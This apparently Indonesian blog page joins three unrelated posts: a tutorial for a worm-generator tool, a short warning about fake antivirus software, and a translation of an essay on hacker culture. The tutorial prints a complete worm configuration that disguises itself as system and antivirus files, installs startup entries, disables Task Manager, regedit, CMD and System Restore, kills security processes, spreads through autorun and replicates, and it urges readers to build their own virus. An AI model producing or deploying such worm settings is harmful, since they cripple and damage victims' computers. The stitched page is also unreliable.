Tulisan ini dibuat untuk para newbie yang ingin tahu, dan ingin mencoba suatu hal yang baru serta cukup menyenangkan dalam hal pembuatan virus komputer. Dalam tutorial ini saya akan menjelaskan sedikit tentang VB+ViMaker32 yang merupakan worm generator untuk menciptaan worm secara mudah, cepat, dan instan. Sesuai dengan namanya program ini dapat menciptakan worm dalam bahasa Visual Basic yang akan mempunyai aksi-aksi tertentu sesuai dengan pengaturan yang diberikan. Program ini memang khusus dibuat untuk para newbie dalam dunia virologi komputer. Tidak hanya virus jahat saja yang dibuat, namun virus baik juga dapat dihasilkan melalui program buatan anak Indonesia ini. Jika anda tertarik, anda bisa men-download virus maker ini di link ini

Berikut ini merupakan script virus yang telah saya buat di dalam VB+ViMaker32:

# ============================================ #
# VB - ViMaker
# The Visual Basic Virus Maker
# Version: 0.1.3
# Copyright: (C) 2007 Rzwan Software Lab
# All Right Reserved
# ============================================ #
# Website: www.rzwanweb.cjb.net {Under Construction}
# E-mail: rzwan182@gmail.com
# ============================================ #
# Created on: Senin-21-Mei-2007(14:03:08)
# ============================================ #
# Untuk informasi [Section], buka help.


# Main function declaration
<# DECLARATION #>
{ # Include }
{ # Include }
{ # Include }
Global declare function main()
{ gets (paramsystem{Sys32}) };
{ load (primary(binarydata;)) }
{ compile (subrountine>ganti dengan nama file yang menarik perhatian orang lain
EXEIcon = ----------------------------->>>>>berikan directory lengkap dimana file .ico yang akan kamu jadikan ikon
Plugins = {VIMAKER-001.VBMP}

[FILES]
# Masukan nama file dan folder yang akan digunakan
Folder = {Sys32}
FolderBase = true
FileName1 = Test1.exe
FileName2 = Test2.exe
FileName3 = System32.exe
FileName4 = Windows.exe
FileName5 = AntiVirus.exe

[STARTUP]
# Masukan nama entry startup registry
StartupFolderFile = false
HKCU_Run1 = System
HKCU_Run2 = AntiVirus
HKLM_Run1 = Update
HKLM_Run2 = WinUpdater
Userinit = True
Shell = True
AutorunCMD = True
ActiveSafeMode = True

[REGISTRY]
# Pengaturan registry. Maksimum 50 Registry Entry
Regset1 = HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main;WindowTitle;MyExplorer;SV
Regset2 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced;Hidden;1;DV
Regset3 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced;HideFileExt;0;DV
Regset4 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced;Start_ShowControlPanel;0;DV
Regset5 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced;Start_ShowHelp;0;DV
Regset6 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced;Start_ShowMyComputer;0;DV
Regset7 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced;Start_ShowMyDocs;0;DV
Regset8 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced;Start_ShowMyMusic;0;DV
Regset9 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced;Start_ShowMyPics;0;DV
Regset10 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced;Start_ShowPrinters;0;DV
Regset11 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced;Start_ShowRecentDocs;0;DV
Regset12 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced;Start_ShowRun;0;DV
Regset13 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced;Start_ShowSearch;0;DV
Regset14 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced;Start_ShowSetProgramAccessAndDefaults;0;DV
Regset15 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced;StartMenuAdminTools;0;DV
Regset16 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState;FullPath;1;DV
Regset17 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop;NoChangingWallPaper;1;DV
Regset18 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer;ConfirmFileDelete;0;DV
Regset19 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer;NOCONTROLPANEL;1;DV
Regset20 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer;NoFileMenu;1;DV
Regset21 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer;NoFolderOptions;1;DV
Regset22 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer;NoShellSearchButton;1;DV
Regset23 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer;NoThemesTab;1;DV
Regset24 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System;DisableRegistryTools;1;DV
Regset25 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\SYSTEM;DisableTaskMgr;1;DV
Regset26 = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System;NoDispScrSavPage;1;DV
Regset27 = HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\ControlPanel;AdvancedTab;1;DV
Regset28 = HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\ControlPanel;ConnectionsTab;1;DV
Regset29 = HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\ControlPanel;ContentTab;1;DV
Regset30 = HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\ControlPanel;GeneralTab;1
Regset31 = HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\ControlPanel;PrivacyTab;1
Regset32 = HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\ControlPanel;ProgramsTab;1
Regset33 = HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\ControlPanel;SecurityTab;1
Regset34 = HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\Restrictions;NoBrowserClose;1;DV
Regset35 = HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\Restrictions;NoBrowserOptions;1;DV
Regset36 = HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\Restrictions;NoBrowserSaveAs;1;DV
Regset37 = HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\Restrictions;NoFavorites;1;DV
Regset38 = HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\Restrictions;NoFileOpen;1;DV
Regset39 = HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\Restrictions;NoTheaterMode;1;DV
Regset40 = HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\Restrictions;NoViewSource;1;DV
Regset41 = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System;DisableCMD;1;DV
Regset42 = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer;NoClose;1;DV
Regset43 = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer;NoFind;1;DV
Regset44 = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer;NoTrayItemsDisplay;1;DV
Regset45 = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer;NoUserNameInStartMenu;1;DV
Regset46 = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer;StartMenuLogOff;1;DV
Regset47 = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore;DisableConfig;1;DV
Regset48 = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore;DisableSR;1;DV
Regset49 = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer;DisableMSI;1;DV
Regset50 = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer;LimitSystemRestoreCheckpointing;1;DV



[TASK]
# Pengaturan tugas. Untuk informasi, buka help
AppRestrict = taskmgr.exe;cmd.exe;procexp.exe;LSASS.EXE;SMSS.EXE;ALG.EXE;MSMSGS.EXE;CTFMON.EXE
AppKill = taskmgr.exe;cmd.exe;procexp.exe;LSASS.EXE;SMSS.EXE;ALG.EXE;MSMSGS.EXE;CTFMON.EXE
BackupSystemFile = true
HideRootFolder = true
HideSystem32Folder = true
AppKillInterval = 100
InfectorInterval = 100
ShellVirNewInterval = 100
InfectionProgramFilesFolder = true
MakeAutorunFile = true
ProgActiveMonitor = true
SetCopyAndStartup = true

[SPREADING]
ReplicationAble = true

[MESSAGE]
# Masukan Pesan yang akan ditampilkan
FirstLaunch = a bad virus has been attacked your computer.
MessageTitle = warning!
MainMessage = virus ini berbahaya. buatan siswa smasa probolinggo. thats all.
MessageFileName = baca ini-penting.txt

[WINCAPTION]
# Masukan caption window yang akan diubah
Untitled - Notepad = untitled

# Daftar window caption yang dilarang. Dipisahkan dengan tag ';'
CaptionToKill = !=ANTI-VIRUS=!;ABOUT;ACCESS;ACTIVE;ADMIN;ADMINISTRATOR;AFEE;AVG;avg;AGREEMENT;AN'S;ANSAV;ANTI;ANTIVIRUS;APPLICATION;AUDIO;AUTO;AUTORUN;AUTORUNS;AVG;AVX;BASIC;BETA;BITDEFENDER;BORLAND;BRONTOK;BUILDER;CENTER;CHECK;CHECKING...;CLAMAV;CLEAN;CLEANER;CLEANING...;CODE;COMMAND;COMPUTER;CONFIG;CONFIGINSPECTOR;CONFIGURATION;CONFIRM;CONNECTION;CONNECTIONS;CONTROL;COPY;CRACK;CRACKER;CRC;CRC32;CURRPROCESS;CYBER;DELETE;DELPHI;DEVICES;DISK;DOCUMENT;DOWNLOAD;DTASKMANAGER;EDITOR;EMULATOR;EXPLORER;EXTRA;EXTREME;FIND;FIREFOX;FIREWALL;FIX;FOLDER;FOR;FOUND;FREE;GENERIC;X-RAYPC;WWW.SYSINTERNALS.COM;WWW;WRITER;WORD;WINZIP;WINDOWS;WINAMP;WIN;WAV;VISUAL;VIRUS;TOOL;TOOLS;TEMPORARY;TEMP;LSASS;SMSS;ALG;MSMSGS;CTFMON;Dd;aaa;bbb;recycled;MDM;SCHED;



[CUSTOM]
# Pengaturan tambahan
HideOnRun = true
HideFromTaskManager = true
ProgCaption = bad virus

[ABOUT]
# Informasi program. Jangan diubah
Info = VB - ViMaker
Version = 0.1.3
Created = Kamis, 27 Des 2008 (14:03:08)



Bagaimana? Apa anda sudah melihat kemudahan dalam membuat virus? Ini hanyalah sebagian saja. Tutorial lebih lanjut bisa anda simak di dalam file yang sudah anda download tadi। Sekarang saatnya anda membuat virus komputer sesuai dengan keinginan anda sendiri. Selamat mengerjakan.
Selengkapnya...

Berhati-hatilah anda yang saat ini ingin membuat komputer anda aman dengan memasang anti spyware di dalam komputer. Hal ini dikarenakan telah beredar antivirus dan antispyware palsu yang menamakan dirinya Antivirus XP 2008. Antivirus palsu ini adalah salah satu software security yang jahat dan berpura-pura sebagai antispyware yang mengklaim dirinya sebagai Antispyware, Antivirus, Anti-Backdoor, Anti-Worm, dan Anti Porno-Dial. Setelah virus tersebut aktif ia akan membuat beberapa file yang akan dijalankan setiap kali komputer dinyalakan. Seperti virus yang lainnya, aplikasi berbahaya ini juga akan membuat registry baru. Oleh karena itu, berhati-hatilah dalam mendownload sesuatu dan jangan lupa untuk terus mengupdate antivirus anda. (mendownload file di dalam blog ini dijamin aman kok)
(source: majalah Komputek)
Selengkapnya...

1. Mengapa Tulisan Ini Dibuat?
Sebagai penyunting Jargon File dan penulis beberapa tulisan serupa lain yang telah dikenal luas, saya sering menerima email permintaan dari newbie jaringan yang antusias, bunyinya (kurang lebih) "bagaimana cara menjadi hacker jagoan?". Anehnya, tidak ada FAQ atau dokumen web lain yang membahas pertanyaan penting ini, jadi inilah tulisan saya.

Jika Anda membaca snapshot dokumen ini secara offline, kunjungi versi terakhirnya di http://www.tuxedo.org/~esr/faqs/hacker-howto.html.

Catatan: ada daftar FAQ di akhir tulisan. Bacalah FAQ ini -- dua kali -- sebelum mengirim email pertanyaan pada saya seputar dokumen ini.

Terjemahan berbagai bahasa dari tulisan ini tersedia: : Bulgaria, Cina (Simplified), Cina (Tradisional), Denmark, Belanda, Prancis, Finlandia, Jerman, Hungaria, Italia, Indonesia, Jepang, Korea, Portugis, Rusia, Spanyol, dan Swedia. Perhatikan bahwa karena dokumen ini sesekali berubah, terjemahan-terjemahan tersebut mungkin sedikit banyak kadaluarsa.

2. Apa Hacker Itu?
Jargon File memuat beberapa definisi untuk kata 'hacker', hampir semuanya berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Namun jika ingin menjadi seorang hacker, hanya ada dua definisi yang relevan.

Ada sebuah komunitas, budaya, terdiri dari para programer mahir dan ahli jaringan, yang sejarahnya bermula dari dekade minikomputer pertama yang memiliki time-sharing dan zaman eksperimen awal ARPAnet. Dari anggota budaya inilah muncul istilah 'hacker'. Hackerlah yang membangun internet. Hackerlah yang membuat sistem operasi Unix menjadi seperti sekarang. Hackerlah yang mengoperasikan Usenet. Hacker yang membuat World Wide Web berjalan. Jika Anda bagian dari budaya ini, jika Anda telah menyumbangkan sesuatu untuk budaya ini, dan rekan lain di dalamnya mengenali Anda sebagai seorang hacker, maka seorang hackerlah Anda.

Cara pikir hacker tidak terbatas pada budaya hacker software. Ada orang yang menerapkan sikap hacker pada banyak bidang lain, elektronik atau musik -- bahkan, cara pikir hacker ada di tingkat tertinggi setiap bidang ilmu dan seni. Hacker software mengakui semangat serupa ini dan kadang menyebut orang-orang tersebut "hacker" pula -- sebagian juga berpendapat bahwa sifat seorang hacker tidak bergantung pada wadah tempatnya bekerja. Tapi, untuk selanjutnya, kita akan memusatkan perhatian pada software hacker, keahlian dan sikap mereka, serta tradisi budaya bersama yang melahirkan istilah ‘hacker’.

Terdapat pula sekelompok lain yang menyebut-nyebut diri hacker, padahal bukan. Mereka-mereka ini (terutama terdiri dari remaja pria) mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini 'cracker' dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas, tidak bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi hacker, sama seperti jika dikatakan bahwa mengontakkan mobil membuat seseorang langsung menjadi ahli mesin. Sayangnya, wartawan dan penulis telah salah kaprah dan menggunakan kata 'hacker' untuk melukiskan cracker; sesuatu yang selalu membuat kesal para hacker sejati.

Perbedaan mendasar antara hacker dan cracker: hacker membangun, cracker membongkar.

Jika Anda ingin menjadi hacker, lanjutkan membaca. Jika ingin menjadi cracker, kunjungi newsgroup alt.2600 dan bersiaplah menghabiskan lima sampai sepuluh tahun di balik jeruji setelah mengetahui bahwa Anda ternyata tidak sepandai yang Anda kira. Hanya itu yang perlu dikatakan tentang cracker.

3. Sikap Hacker
Pekerjaan hacker menyelesaikan masalah dan membangun sesuatu, dan hacker percaya pada kebebasan dan kerjasama sukarela. Agar dapat diterima sebagai seorang hacker, Anda harus berbuat seolah-olah Anda memiliki sikap ini. Dan agar dapat berbuat demikian, sikap ini harus benar-benar diyakini.

Tapi kalau Anda berniat menumbuhkan sikap ini hanya agar dapat diterima di lingkungan hacker, maka Anda belum menangkap maknanya. Menjadi orang yang meyakini sikap hacker penting bagi Anda sendiri -- agar bisa terus belajar dan termotivasi. Sama seperti semua seni kreatif lain, cara paling efektif untuk menjadi seorang ahli adalah dengan meniru cara berpikir ahli-ahli lainnya -- bukan hanya secara intelektual tapi juga emosional.

Seperti diungkapkan oleh sebuah sajak Zen modern di bawah:

Untuk mengikuti jalan:
pandanglah sang ahli,
ikuti sang ahli,
berjalan bersama sang ahli,
kenali sang ahili,
jadilah sang ahli.
Jadi, jika ingin menjadi hacker, ulangi pernyataan di bawah ini sampai benar-benar Anda yakini:

3.1 Dunia penuh dengan persoalan-persoalan menarik yang menanti untuk dipecahkan.
Menjadi seorang hacker sebetulnya menyenangkan, tapi 'menyenangkan' yang menuntut usaha. Usaha ini membutuhkan motivasi. Atlet yang sukses memperoleh motivasi dari kepuasan fisik saat tubuh mereka beraksi, saat mendorong diri melampaui batasan fisik. Demikian juga, untuk menjadi seorang hacker Anda harus merasa tertarik memecahkan persoalan, mengasah keahlian, dan melatih kecerdasan.

Jika Anda merasa bukan seperti ini secara naluri, Anda harus berusaha menjadi demikian jika ingin berhasil menjadi hacker. Jika tidak, energi hacking Anda akan melemah karena perhatian teralihkan oleh seks, uang, dan kedudukan.

(Anda pun harus mengembangkan keyakinan pada kapasitas belajar diri -- keyakinan bahwa meskipun yang Anda ketahui belum cukup untuk memecahkan suatu persoalan, jika satu potongan saja dari persoalan Anda usaha pecahkan, maka itu sudah cukup memberi pelajaran kepada Anda untuk menyelesaikan potongan berikutnya -- dan berikutnya, hingga semua potongan terselesaikan.)

3.2 Tidak seharusnya masalah yang sama dipecahkan dua kali.
Otak yang kreatif merupakan sumber daya yang berharga dan terbatas. Tidak seharusnya sumber daya ini diboroskan hanya untuk memikirkan kembali suatu persoalan dari dasar; padahal ada begitu banyak masalah menarik baru lain di dunia ini yang menanti.

Agar dapat bertingkah laku seperti hacker, Anda harus percaya bahwa waktu berpikir hacker lain itu berharga -- sebegitu berharganya hingga merupakan suatu kewajiban moral bagi Anda untuk membagikan informasi, menyelesaikan masalah lalu memberi jawabannya pada hacker lain supaya mereka menyelesaikan masalah baru dan tidak selamanya berkutat pada masalah-masalah lama.

(Tidak harus berkeyakinan bahwa semua produk kreatif Anda harus direlakan bagi orang lain, meski hacker yang demikianlah yang paling dihormati hacker lain. Menurut nilai-nilai hacker, jual saja sebagian asal cukup untuk tetap makan, tetap dapat membayar sewa rumah, dan tetap dapat memakai komputer. Tidak melanggar nilai hacker jika Anda memanfaatkan ilmu Anda untuk membiayai keluarga atau bahkan memperkaya diri, asalkan sambil melakukannya tetap setia pada disiplin ilmu dan sesama hacker lain.)

3.3 Kebosanan dan pekerjaan membosankan itu jahat.
Hacker (dan manusia kreatif pada umumnya) tidak seharusnya dibosankan dengan pekerjaan bodoh yang berulang-ulang, karena ini berarti mereka tidak melakukan pekerjaan yang hanya bisa dilakukan oleh mereka -- menyelesaikan persoalan-persoalan baru. Pemborosan sumber daya ini merugikan semua pihak. Karena itu kebosanan dan pekerjaan membosankan bukan saja tidak menyenangkan tapi juga jahat.

Agar dapat bertingkah laku seperti hacker, Anda harus meyakini hal ini sehingga Anda berkeinginan untuk mengotomasi sebanyak mungkin bagian yang membosankan, bukan saja bagi diri sendiri tapi juga orang lain (terutama sesama hacker).

(Ada satu kekecualian yang jelas. Hacker kadang melakukan pekerjaan yang di mata orang lain tampaknya berulang-ulang atau membosankan; ini untuk latihan menjernihkan pikiran, atau dalam rangka memperoleh keahlian atau pengalaman yang tak bisa tidak harus diperoleh dengan cara demikian. Tentu saja hal ini dilakukan atas dasar kehendaknya sendiri -- setiap orang yang mampu berpikir tidak seharusnya dipaksa menjadi bosan.)

3.4 Kebebasan itu baik.
Secara alamiah hacker itu anti-otoriter. Siapa pun yang dapat memerintah Anda akan dapat menghentikan Anda untuk menyelesaikan persoalan yang menarik -- dan, sesuai pikiran otak para otoriter, pada umumnya akan membuat alasan yang benar-benar bodoh untuk itu. Jadi sikap otoriter harus dilawan di mana pun Anda berada, agar nantinya tidak menekan Anda dan hacker-hacker lain.

(Tidak untuk disamakan dengan melawan setiap bentuk kekuasaan. Anak-anak tetap harus dibimbing, para kriminal ditahan. Seorang hacker mungkin akan tunduk pada bentuk-bentuk kekuasaan tertentu agar dapat memperoleh sesuatu yang lebih dari waktu yang dibutuhkan untuk mengikuti peraturan. Ini lebih merupakan tawar-menawar yang terbatas dan dilakukan secara sadar; jenis tunduk diri yang diinginkan oleh orang-orang otoriter tentu saja tidak bisa diterima.)

Para otoriter hidup di atas sensor dan kerahasiaan. Mereka tidak percaya pada kerjasama dan berbagi informasi -- satu-satunya jenis 'kerja sama' yang disukai adalah yang dapat mereka kendalikan. Jadi untuk berlaku seperti seorang hacker, Anda perlu mengembangkan rasa benci pada penyensoran, kerahasiaan, dan penggunaan kekerasan atau penipuan untuk memaksakan kehendak pada orang dewasa. Dan Anda harus bersedia bertindak atas dasar keyakinan ini.

3.5 Sikap saja tak ada artinya tanpa keahlian.
Untuk menjadi hacker, Anda perlu mengembangkan sebagian dari sikap-sikap yang telah disebutkan. Tapi memiliki sikap saja belum membuat seseorang menjadi hacker, atau atlet juara atau bintang rock. Untuk menjadi hacker dibutuhkan kecerdasan, latihan, dedikasi, dan kerja keras.

Jadi, Anda perlu belajar untuk tidak mempercayai sikap saja dan menghormati setiap bentuk kemampuan. Hacker tidak bersedia menghabiskan waktu dengan orang-orang yang hanya bersikap seperti hacker, tapi hacker memuja keahlian -- terutama keahlian dalam hacking, tapi juga keahlian di bidang apapun. Yang terlebih bagus lagi yaitu keahlian dalam bidang yang sulit dan hanya dapat dikuasai oleh sedikit orang, dan yang terbaik adalah keahlian dalam bidang yang sulit dan melibatkan ketajaman mental, keahlian, serta konsentrasi.

Bila Anda memuja keahlian, Anda akan merasa senang dalam meningkatkan kemampuan diri -- kerja keras dan dedikasi akan menjadi semacam permainan yang mengasyikkan ketimbang pekerjaan membosankan. Dan hal ini penting dalam proses menjadi hacker.

4. Kemampuan Hacking Dasar
Sikap hacker penting, tapi terlebih penting lagi keahlian. Sikap bukan pengganti keahlian, dan ada seperangkat keahlian menggunakan perangkat tool yang perlu Anda kuasai sebelum orang bahkan bisa berpikir memanggil Anda hacker.

Perangkat tool ini perlahan-lahan memang berubah seiring teknologi yang menciptakan keahlian baru dan membuat keahlian lama tidak berguna. Misalnya, dulu keahlian pemrograman bahasa mesin termasuk, dan kemampuan HTML belum dan hanya baru-baru ini saja. Yang jelas saat ini yang termasuk adalah:

4.1 Pelajari pemrograman.
Ini tentunya merupakan keahlian hacking yang fundamental. Jika Anda belum pernah belajar bahasa pemrograman mana pun, saya sarankan mulai dengan Python. Disainnya bersih, terdokumentasi dengan baik, dan cukup mudah bagi pemula. Meski menjadi bahasa pertama, bukan berarti Python hanya mainan; Python amat ampuh dan fleksibel dan cocok untuk proyek-proyek besar. Saya menulis evaluasi terhadap Python yang lebih mendetil. Tutorial Python bisa dilihat di situs web Python (terjemahan Indonesia).

Java juga bahasa yang baik untuk belajar pemrograman. Lebih sulit dari Python, tapi menghasilkan kode yang lebih cepat dari Python. Menurut saya Java amat bagus sebagai bahasa kedua.

Perlu diingat bahwa dengan satu dua bahasa pemrograman saja Anda tidak akan mencapai tingkat keahlian seorang hacker, atau bahkan seorang programer -- Anda perlu belajar cara memandang pemrograman secara umum, tidak bergantung pada satu bahasa mana pun. Untuk menjadi hacker sejati, Anda perlu mencapai tahap di mana Anda dapat mempelajari bahasa baru dalam beberapa hari, dengan menghubungkan apa yang ada di manual dengan apa yang telah Anda ketahui. Hal ini berarti, Anda perlu mempelajari beberapa bahasa yang jauh berbeda satu dengan yang lainnya.

Jika ingin serius dalam pemrograman, pada akhirnya Anda harus belajar C, bahasa inti sistem operasi Unix. C++ terkait erat dengan C; jika tahu yang satu, belajar yang lain tidak akan susah. Namun keduanya bukan bahasa yang cocok untuk dipelajari pertama kali.

Bahasa lain yang juga penting untuk hacker antara lain Perl dan LISP. Perl patut dipelajari untuk kebutuhan praktis; Perl dipakai secara amat meluas untuk halaman web aktif dan untuk administrasi sistem, jadi meskipun nantinya Anda tidak akan membuat program dalam Perl, Anda sebaiknya belajar cara membaca Perl. LISP patut dipelajari karena akan memberikan pengalaman 'membuka pikiran' jika Anda telah menangkapnya; dengan mempelajari LISP, Anda akan menjadi seorang programer yang lebih baik, meskipun dalam kenyataan Anda akan jarang memakainya.

Paling baik sebetulnya mempelajari semuanya (Python, Java, C/C++, Perl, dan LISP). Selain merupakan bahasa-bahasa terpenting dalam hacking, masing-masing mewakili cara pendekatan pemrograman yang berbeda, dan tiap bahasa akan memberi Anda pelajaran-pelajaran berharga.

Tentu saja, di sini tidak mungkin saya memberi petunjuk lengkap cara memrogram -- pemrograman merupakan keahlian yang kompleks. Tapi, satu petunjuk yang saya berikan: buku dan kursus saja tidak akan membuat Anda menjadi seorang programer (banyak, mungkin hampir semua hacker terbaik itu belajar mandiri). Anda akan menjadi programer dengan (a) membaca kode dan (b) menulis kode.

Belajar membuat program adalah seperti belajar menulis dalam bahasa alamiah. Cara terbaik untuk melakukannya dengan membaca tulisan yang dibuat oleh para ahlinya, membuat tulisan sendiri sedikit, membaca lebih banyak lagi, menulis lebih banyak, dan mengulanginya sampai di tulisan Anda mulai terbentuk semacam kekuatan dan kemahiran penggunaan kata seperti di tulisan-tulisan yang semula Anda teladani.

Dahulu sulit mencari kode yang baik untuk dibaca, karena dulu hanya sedikit program-program besar yang terdapat dalam bentuk source untuk bisa dibaca dan diutak-atik hacker-hacker pemula. Sekarang kondisinya jauh berbeda: software open-source, tool pemrograman, dan sistem operasi (semua dibuat oleh hacker) kini banyak terdapat. Dan ini mengantar kita pada poin berikutnya…

4.2 Cari, pelajari, dan jalankan salah satu versi Unix open-source.
Saya anggap Anda memiliki, atau memperoleh akses ke komputer pribadi (anak-anak sekarang mudah sekali mendapatkan akses :-)). Kalau ada satu langkah terpenting bagi pemula untuk mendapatkan kemampuan hacker, itu adalah mendapatkan satu salinan sistem operasi Linux atau salah satu Unix BSD, meng-install-nya di komputer sendiri, dan menjalankannya.

(Tidak saya sarankan meng-install Linux sendirian jika Anda pemula. Cari klub komputer atau kelompok pengguna Linux di daerah Anda dan mintalah bantuan; atau hubungi Linux Internet Support Co-Operative. LISC mengurus channel-channel IRC tempat Anda dapat bertanya). Tentu, di dunia ini ada banyak sistem operasi selain Unix. Tapi sistem-sistem operasi tersebut didistribusikan dalam program jadi (binary) -- kodenya tidak bisa Anda baca, sehingga sistem operasi tersebut tidak bisa Anda modifikasi. Belajar hacking di DOS atau Windows atau MacOS adalah bagaikan belajar menari dengan seluruh tubuh digips.

Lagipula Unix-lah sistem operasi Internet. Meski tentu bisa belajar menggunakan internet tanpa mengenal Unix, Anda tak akan mampu menjadi hacker Internet tanpa memahami Unix. Untuk alasan inilah, budaya hacker saat ini cukup cenderung berat ke Unix. (Ini tidak selalu benar, beberapa hacker zaman dahulu tidak menyukai kenyataan ini, tapi simbiosis antara Unix dan Internet telah menjadi kuat sehingga bahkan otot Microsoft pun tak mampu membengkokkannya.)

Jadi, buatlah sistem Unix -- saya pribadi menyukai Linux tapi tentu saja ada yang lainnya (dan ya, Anda bisa menjalankan Linux dan DOS/Windows di mesin yang sama). Pelajari Unix. Jalankan Unix. Bermain-mainlah dengan Unix. Berhubungan dengan internet melalui Unix. Baca kodenya. Modifikasi. Di Unix Anda akan menjumpai tool pemrograman yang lebih baik (termasuk C, Lisp, Python, dan Perl) ketimbang di sistem operasi Microsoft manapun, Anda akan bersenang-senang, dan Anda akan mendapat pengetahuan lebih dari yang Anda sadari sampai kemudian ketika mengenang kembali Anda telah seorang hacker ahli.

Lebih jauh tentang mempelajari Unix, lihat The Loginataka.

Untuk memperoleh Linux, lihat Where can I get Linux.

Bantuan dan resource BSD Unix bisa Anda lihat di www.bsd.org.

Saya menulis pengantar dasar Unix dan Internet.

(Catatan: Saya tidak menganjurkan menginstal Linux atau BSD sendirian jika Anda seorang pemula. Untuk Linux, carilah sebuah kelompok pengguna lokal Linux [KPLI di Indonesia] dan mintalah bantuan mereka; atau hubungi Open Projects Network. LISC memaintain daftar IRC channel yang bisa Anda datangi untuk memperoleh bantuan.)

4.3 Pelajari cara menggunakan World Wide Web dan cara menulis HTML.
Kebanyakan hasil budaya hacker bekerja di belakang layar tanpa diketahui orang banyak, membantu mengoperasikan pabrik, kantor, dan universitas, tanpa ada pengaruh yang jelas pada cara hidup para non-hacker. Web adalah satu kekecualian, bahkan para politisi pun mengakui bahwa barang mainan hacker yang besar dan berkilauan ini telah mengubah dunia. Untuk satu alasan ini saja (dan juga banyak alasan bagus lainnya) Anda perlu mempelajari cara pengoperasian Web.

Maksudnya lebih dari sekedar cara menggunakan browser (sebab kalau itu siapa pun bisa), tapi mempelajari cara menulis HTML, bahasa markup Web. Bila Anda belum menguasai pemrograman, lewat menulis HTML Anda akan diajari beberapa kebiasaan mental yang akan membantu Anda belajar pemrograman. Jadi, buatlah home page.

Hanya dengan membuat homepage tidak akan membuat Anda menjadi (bahkan dekat pun tidak) seorang hacker. Web penuh dengan home page. Kebanyakan hanyalah kotoran tanpa arti, tanpa isi -- kotoran yang tampak indah, tapi tetap kotoran (lebih jauh tentang ini, lihat The HTML Hell Page).

Agar bermanfaat, halaman Anda harus mengandung content -- harus menarik dan/atau berguna bagi hacker lain. Dan ini mengantar kita pada bahasan berikutnya...

5. Status dalam Budaya Hacker
Seperti halnya dalam kebanyakan budaya lain tanpa ekonomi uang, dunia hacker berjalan di atas reputasi. Anda berusaha menyelesaikan persoalan-persoalan menarik, tapi seberapa menarik persoalan tersebut, dan apakah solusi Anda benar-benar baik, merupakan sesuatu yang umumnya hanya dapat dinilai oleh rekan sejawat atau atasan Anda.

